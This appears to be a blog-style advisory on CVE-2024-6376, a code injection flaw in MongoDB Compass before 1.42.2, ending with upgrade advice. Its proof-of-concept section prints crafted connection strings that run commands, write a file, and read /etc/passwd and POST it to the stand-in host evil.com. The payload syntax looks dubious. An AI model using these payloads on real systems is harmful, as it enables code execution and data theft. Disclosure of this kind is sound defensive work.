CVE-2024-6376 is a critical code injection vulnerability that affects MongoDB Compass—the popular GUI for MongoDB databases. The flaw is tied to insufficient sandbox protection in the Compass desktop client, specifically in how it handles the ejson shell parser during database connection. If you’re using Compass versions before 1.42.2, your system could be at risk.
Let’s break down everything you need to know about this vulnerability, how it works, and what you should do right away to stay safe.
What’s the Issue? (Technical Details Simplified)
MongoDB Compass allows users to enter “connection strings” to access their databases. These strings sometimes use a format called “ejson” (Extended JSON) for flexibility. Unfortunately, in versions before 1.42.2, the way the ejson parser is embedded inside the Compass application doesn’t enforce strict sandboxing. This means that malicious code placed in the connection string can break outside the intended parser and run code on your computer.
User opens Compass and inputs a database connection string.
2. If the connection string is malformed or includes crafted payloads, the ejson parser can execute JavaScript code directly.
3. Since Compass did not properly sandbox the parser, this code can access filesystem, environment variables, or even the network.
Imagine an attacker sends you a connection string like this
mongodb://localhost:27017/?authSource=admin&readPreference=primary&ssl=false&shell={ "$where": "function() { require('child_process').exec('calc.exe'); return true; }" }
If the ejson parser is not sandboxed, connecting with this string could pop open the Calculator app on Windows—or worse.
Proof-of-Concept (PoC) Code Example
Below is a PoC to demonstrate how an attacker might exploit Compass before version 1.42.2.
Malicious Connection String Example
mongodb://localhost:27017/?shell={
"$where": "function() { require('fs').writeFileSync('hacked.txt', 'You have been hacked!'); return true; }"
}
If this string is parsed unsafely, it writes a file named hacked.txt in the Compass working directory.
JavaScript Payload in ejson
For advanced attacks, ejson accepts JavaScript functions. Here’s how an attacker could leak sensitive files:
mongodb://localhost:27017/?shell={
"$where": "function() {
const fs = require('fs');
const token = fs.readFileSync('/etc/passwd').toString();
// Send the token to a remote server
require('https').request({hostname:'evil.com',method:'POST',path:'/leak'}, r=>{}).end(token);
return true;
}"
}
Exploitation Scenario
1. Phishing: An attacker convinces a user to download or paste a malicious connection string into Compass.
2. Remote Code Execution: The ejson parser runs the payload as raw JavaScript, accessing the system.
3. Data Exfiltration or Tampering: Files are written, read, or sent externally—all without the victim’s knowledge.
Original References and Patches
- MongoDB Compass Release Notes (1.42.2)
- Official CVE database entry for CVE-2024-6376
- MongoDB Security Advisories
Mitigation and Fixes
Users should immediately upgrade to Compass 1.42.2 or later. The vulnerable parser has been properly sandboxed in this version.
- Update Download: MongoDB Compass Download Page
Avoid opening untrusted connection strings and sharing database credentials sent by others until you’re fully updated.
Admins: Check systems for unknown files (like hacked.txt) if you believe users opened suspicious strings.
Conclusion
CVE-2024-6376 is a serious code injection flaw affecting MongoDB Compass before 1.42.2. With minimal user interaction, it could allow attackers to run arbitrary code and compromise systems. Patch now and spread the word among your database teams.
Stay safe, and only use software from trusted sources—updated to the latest version.
Timeline
Published on: 07/01/2024 15:15:17 UTC
Last modified on: 07/03/2024 15:04:52 UTC